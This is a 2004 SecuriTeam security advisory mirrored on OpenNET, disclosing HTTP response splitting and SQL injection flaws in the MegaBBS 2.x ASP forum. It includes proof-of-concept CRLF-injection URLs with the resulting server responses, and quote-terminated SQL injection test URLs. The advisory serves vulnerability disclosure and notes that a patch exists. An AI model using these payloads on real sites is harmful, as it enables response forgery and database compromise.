The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


[NT] HTTP Response Splitting and SQL Injection in Megabbs Forum


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: 1 Oct 2004 09:55:08 +0200
From: SecuriTeam <[email protected]>
To: [email protected]
Subject: [NT] HTTP Response Splitting and SQL Injection in Megabbs Forum

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  HTTP Response Splitting and SQL Injection in Megabbs Forum
------------------------------------------------------------------------


SUMMARY

 <http://www.pd9soft.com/megabbs-support/index.asp>; MegaBBS is "a 
complete, fully featured ASP website system. Includes an extremely 
powerful forum, calendars, polls, and photo albums. Best of all, it's 
completely free! Find out why MegaBBS is one of the fastest growing ASP 
messaging portals available today."
Multiple vulnerabilities in MegaBBS allow a malicious attacker to control 
HTTP header response from the server running the application and run 
arbitrary SQL commands on the target machine's database.

DETAILS

Vulnerable Systems:
 * MegaBBS Version 2.x

HTTP Response Splitting:
MegaBBS does not properly filter user input characters while redirecting 
to a different page. This allows a malicious attacker to control the HTTP 
response from the server.

Example1 (URL wraps):
http://www.example.com/megabbs/forums/thread-post.asp?action=writenew&fid=%0
d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20
text/html%0d%0aContent-Length:%2033%0d%0a%0d%0a%3chtml%3eScanned%20by%20Maxp
atrol%3c/html%3e%0d%0a&tid=4924&replyto=22947&displaytype=flat

Server result:

HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 26 Sep 2004 14:14:02 GMT
Server: Microsoft-IIS/6.0
Location: /megabbs/forums/forum-view.asp?fid=
Content-Length: 0

HTTP/1.0 200 OK
Content-Type: text/html
Content-Length: 33

Scanned by Maxpatrol

Content-Length: 290
Content-Type: text/html
Expires: Sun, 26 Sep 2004 14:13:02 GMT
Set-Cookie: guestID=309; path=/
Set-Cookie: ASPSESSIONIDAQRTADCB=KNEIJIEDEMJPNNKPNFONOIFL; path=/
Cache-contro


Example2 (URL wraps):
http://www.example.com/megabbs/forums/thread-post.asp?fid=%0d%0aContent-Leng
th:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aC
ontent-Length:%2033%0d%0a%0d%0a%3chtml%3eScanned%20by%20Maxpatrol%3c/html%3e
%0d%0a&action=writenew&displaytype=flat

Result:

HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 26 Sep 2004 14:34:05 GMT
Server: Microsoft-IIS/6.0
Location: /megabbs/forums/forum-view.asp?fid=
Content-Length: 0

HTTP/1.0 200 OK
Content-Type: text/html
Content-Length: 33

Scanned by Maxpatrol

Content-Length: 290
Content-Type: text/html
Expires: Sun, 26 Sep 2004 14:33:05 GMT
Set-Cookie: guestID=421; path=/
Set-Cookie: ASPSESSIONIDAQRTADCB=HCGIJIEDMBPIHPCDJFKACJAC; path=/
Cache-contro


Multiple SQL injection:
In ladder-log.asp page:
ladder-log.asp?categoryid=1&sortby=completeddate&sortdir=1'
ladder-log.asp?categoryid=1&filter=id&criteria=1'
in view-profile.asp page:
view-profile.asp?type=single&memberid=1'
view-profile.asp?type=team&teamid=1'

Vendor Status:
A patch addressing these issues has been released and can be obtained at:  
<http://www.pd9soft.com/megabbs/forums/thread-view.asp?tid=4924>; 
http://www.pd9soft.com/megabbs/forums/thread-view.asp?tid=4924


ADDITIONAL INFORMATION

The information has been provided by  <mailto:[email protected]> 
pigrelax.




This bulletin is sent to members of the SecuriTeam mailing list. To unsubscribe from the list, send mail with an empty subject line and body to: [email protected] In order to subscribe to the mailing list, simply forward this email to: [email protected]

DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру